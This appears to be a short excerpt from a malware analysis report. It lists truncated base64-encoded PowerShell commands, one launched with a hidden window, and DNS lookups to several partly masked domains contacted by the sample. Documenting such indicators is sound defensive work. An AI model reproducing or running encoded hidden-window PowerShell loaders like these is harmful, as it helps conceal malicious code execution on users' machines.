Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABlADQAOQA1AGIAZAA1AGIAMgBjADAANgA5ADQAZAA9ACcAYQAwAHgAMwBiAGUAZgBjADYAZgBhAGQANABiACcAOwAkAG...
- DNS ASK st#.###hodist.org.hk
- DNS ASK co######bles.nojosh.com.au
- DNS ASK el###nbank.com
- DNS ASK nd##c.org
- DNS ASK my###o.store
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABlADQAOQA1AGIAZAA1AGIAMgBjADAANgA5ADQAZAA9ACcAYQAwAHgAMwBiAGUAZgBjADYAZgBhAGQANABiACcAOwAkAG...' (with hidden window)